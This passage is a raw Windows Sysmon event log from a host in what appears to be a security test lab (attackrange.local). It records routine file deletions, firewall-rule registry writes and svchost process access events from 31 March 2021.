12:02:17.305{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=053B5126E4936135A10775DA26758C75,SHA256=A9B4943208F2BF5CF44DD3FA79428368D4836399A0B9AB9A0167366D9C57D43C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txtMD5=91784C62BBC0181E5D1A1939D62C7576,SHA256=7C5953F43236E76AD1EABF5FB4E75FDC98F73A7686BFF5C023843D16A53C2CA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txtMD5=E15FA9A83F9216A78A5E4AE2C2C08305,SHA256=65E0957B6D224D885497EE696AA97F94FE98D8BFBBD4F927508ABD645A4182BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txtMD5=83CDB65FC5E3B9880848CA153945CD99,SHA256=E2E2AC74937053440DD9592C7CC1619F3290A042838C9922D69E1B5BFF985B89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txtMD5=94E8C0A2D77D4C6A4CC2AA5D6D71B3FC,SHA256=F0E0AA4CBFFAC78A340ADD726D7D94A090CE6D8E6DEFBC9673531B4E5053B05D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.258{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txtMD5=3F65ED27EE681BC5D4F69A5C271DB6A1,SHA256=63828079B72050681B6811C4AA76A79CF8FB5F51E04B1596DBD761007BFC829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.258{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txtMD5=006B1BF929F2A82B7AD00727A9F1623C,SHA256=A9F72540A0C0F03453F87AC641EB31BF401D6BE7A92F4615E9C49C7725BC3427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.133{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txtMD5=203D482240E2A13DE24F8F82A9037348,SHA256=5B64FA6B42BE7F59D4D48C4C85ED73B9311003133E8F02F04AE6FA198CD81ED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.118{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\appcache[1].manMD5=5F027173844AA0ED63AE4AC12D3B615C,SHA256=72ADFCEA238F8F0B956A60BED2C609F825973CA4D52B5D92E3D41C51E15B40DF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-4|C=S-1-15-3-15993189-1149757597-3280441496-4094800555|C=S-1-15-3-139472938-1339732804-1469114779-4031155563|C=S-1-15-3-1849407097-1086866290-155560606-3624675039|C=S-1-15-3-2015030808-1290041139-4103196845-2461361948|C=S-1-15-3-2973957182-1175190094-721927306-1883016034|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|M=microsoft.windows.shellexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|D=C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F6A61CBC-5D69-4F0A-96E8-0897A7A528FB}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F8E0A5CC-A1F1-4C96-9ADD-2FF08FC38EAD}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{67BAD8B2-7DCB-4714-A1B1-AE61F6D60200}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.087{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E0CD201B-C978-4C73-A8BE-BB705A6A4385}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 11241100x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.087{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.087 23542300x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.071{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.binMD5=2477E1067EE108D32AA262307A357732,SHA256=C1A0FD9DA6CCA70C5D69C4E62FBDC08EBABCEAB018611E869B6F78EBABE9E640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.071{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.binMD5=1454E96AC56B9536AB32CCA75F5E5D45,SHA256=9568E2708BEE9FE90D3D981F9D52415DED574A95BF9525EEE961A2467C9F5325,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 